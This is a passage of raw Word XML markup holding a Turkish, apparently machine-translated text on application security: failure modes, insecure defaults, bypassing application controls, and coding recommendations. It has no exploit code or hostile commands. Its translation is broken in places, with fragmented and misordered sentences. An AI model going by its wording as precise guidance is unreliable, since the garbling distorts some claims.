        <w:t xml:space="preserve"> Alternatif olarak, uygulama oturum açmak için başarısız olabilir. Yıllarca, bu s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eçim için başarısızlık moduydu. Ç</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ok kullanıcılı, zamanın çok uygulamalı sistemleri. Kullanıcının</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> çare, oturum açıp başlatmaktı.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tekrar uygulama. Bu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> güvenli ve oldukça düzenliydi. </w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows ve UNIX gibi daha modern sistemlerde, uygulamanın başarısız olması terc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ih edilen başarısızlık modudur. İ</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>şletim sistemine. Tek kullanıcılı, çoklu uygulama sistemlerinde bu oldukça gü</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">venli ve düzenlidir. İzin verir. </w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Uygulamayı ve verileri kurtarmak için işletim sistemini kullanmak için kullanıcı. Bununla birlikte, çok kullanıcılı, çok uygulamalı sistemlerde hala yaygın olmasına rağmen, bu arıza </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>modu</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> daha tehlikelidir. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nitekim çökmesini çok güvensiz</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> uygulamalar, yalnızca uygulama sistemleri olması amaçlanan saldırı sistemleri için tercih edil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>en bir yöntem haline gelmiştir.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uygulamanın çökmesine neden olur ve saldırgan işletim sistemine bakarken ken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dini bulabilir (komut işlemcisi</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> veya uygulamayı başlatan kişinin kimliğine ve imtiyazlarına sahip grafiksel kullanıcı arayüzü [GUI]).</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En kötü durumda, bu kişi sistem yöneticisidir.</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GÜVENSİZ VARSAYILANLAR</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n kontrollere sahip uygulamalar bile, genellikle bu kontrollerin güvensiz ayar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>larına varsayılandır. Demek ki,</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> uygulama ilk yüklendiğinde ve yükleme yapan kullanıcı bir şeyleri değiştirinceye ka</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dar, sistem güvenli olmayabilir</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> yapılandırdı. Yaygın bir örnek denetim izleridir. Uygulamaya, yaptıklarını ve gördüklerini kaydedip kaydetmediği konusunda yönetim kontrol edilebilir. Ancak, kutunun dışında v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e yönetimin müdahalesinden önce</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> dergiler varsayılan olarak “kapalı” dır. Benzer şekilde, yönetime şifre uzunluğunun kontrolü de verilebilir. Tekra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r dışarı</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kutunun içinde, şifre uzunluğu va</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rsayılan olarak sıfır olabilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bir sistemin neden güvenli olmayan şartlar için varsayılan olarak ayarlanması gerektiğine dair her türlü iyi b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ahane vardır. Bunlar genellikle</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kurulum kolaylığı ile ilgilidir. Bunun nedeni, sist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>em güvenli ayarları başlatırsa,</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> prosedür, tek çare kurulumunu iptal edip başlatmak olan bir kil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>itlenme durumuna neden olabilir</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bitti. Zorluk, sistem kurulduktan ve çalıştıktan sonra, </w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>kurucunun genellikle herhangi bir şeyi yapmak için isteksiz ol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>masıdır.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Onu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nla karışabilecek değişiklikler.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bazı durumlarda, tasarımcıların veya programcıların güvenli varsayılan değerlerin ne ol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>duğunu bilmesi mümkün değildir.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Çevreyi veya uygulamayı bilmiyorlar. Öte yandan, kullanıcıl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ar kontrolleri anlayamayabilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Eğer kontroller karmaşıksa ve ince şekillerde etkileşime girerse, bu durum daha da kötüleşebilir. Bi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r sistem için bir kontrol vardı</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kullanıcıların şifrelerini maksimum ömürde değiştirmelerini sağlamak. Yapabilmesi için </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ayrı bir kontrolü vardı.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kendisiyle değiştirilemez. Bu kontrolün çalışmasını sağlamak için, minimum ömrünü belirlemek </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>üzere üçüncü bir kontrol vardı.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Parola. Bu kontrollerin etkileşimini anlamak için büyük mik</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tarda özel bilgi gerekiyordu ve</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> etkili kullanımları.</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UYGULAMA KONTROLLERİ</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3.1. Uygulama Kontrollerine Özel Güven</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001E2328"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lama tasarımcısı sık sık uygulama programı denetimlerine, dosya sistemine güve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nip güvenmeyeceğine karar verir</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>den etimler, veri tabanı yöneticisi denetimleri veya bunların bir kombinasyonu. Uygulam</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a programcıları bazen güveniyor</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> münhasıran uygulama programındaki kontroller üzerinde. Bunun bir avantajı, kayıt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> yaptırmaya gerek kalmamasıdır.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kullanıcı, dosya sistemine veya veri tabanı yöneticisine veya kullanıcının bu sistemlere ayrıcalıklarını ve sınırlamalar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ını tanımlamak için kullanılır.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bununla birlikte, uygulama bu sistemlere sıkıca bağlı değilse, ya </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ortak bir işletim sistemi ya da</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> şifreleme, bir güvenlik açığı ortaya çıkar. Kullanıcının veya saldırganı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n dosya sistemine erişmesi veya</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> doğrudan veri tabanı yöneticisi. Yani, uygulama kontrollerini atlamak mümkündür. B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>u sorun genellikle ortaya çıkar</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uygulama tek sistemli bir ortamda geliştirildiğinde</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, başvuru ve dosya servisi veya </w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>verit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>abanı yöneticisi tek bir işletim sistemi altında çalışı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">r ve daha sonra dağıtılır. </w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Veri tabanı yöneticisinin kontrollerinin uygulamadakilerden daha güveni</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lir olduğunu unutmayın. Kontrol</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> daha lokalizedir ve kullanıcı tarafından girişimden veya b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ypasstan korunur. Diğer yandan,</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kullanıcının veri tabanı yöneticisine kayıtlı olmasını ve erişim kontrol kuralla</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rının yönetilmesini gerektirir.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bypass kontrolündeki bu güvenlik açığı diğer bağlamlarda da ortaya çıkmaktadır. Örneğin, kontroller atlanabilir dosya sisteminden ziyade işletim sisteminde erişim kontrolü olan tek kullanıcılı, çok uygulamalı sistemler. Saldırgan, tamamen ayrıcalıklı olduğu kendi işletim sistemini getirir ve bunu yerine ayrıcalıklarının</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> olmadığı işletim sistemi.</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ÖNERİLER</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Uygulamalar oluşturulurken ve sahnelenirken aşağıdaki önerilere dikkat edilmelidir. Bağlı </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kalarak</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bu öneriler, programcı ve uygulama yöneticisi, belirtilen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> hataların çoğundan kaçınabilir</w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bu bölümde.</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 Güvenilen tüm kısıtlamaları uygulayın.</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2. Tüm parametreleri kontrol edip istenen uzunluk ve kod türüyle sınırlandırın.</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3. Kısa ve basit programları ve program modüllerini tercih edin. Sadece bir giriş noktası olan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> programları tercih et </w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>üstte veya başında ve altta veya sonunda yalnızca bir çıkış.</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4. Hem parametre kontrolü hem de hata düzeltmesi için iyi test edilmiş genel r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">utinlere güvenmeyi tercih edin. </w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Veritabanı istemcisi ile birlikte verilen rutinlerin kullanımını düşünün. Para</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">metre kontrolü ve hata düzeltme </w:t>
      </w:r>
      <w:r w:rsidRPr="007E79CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
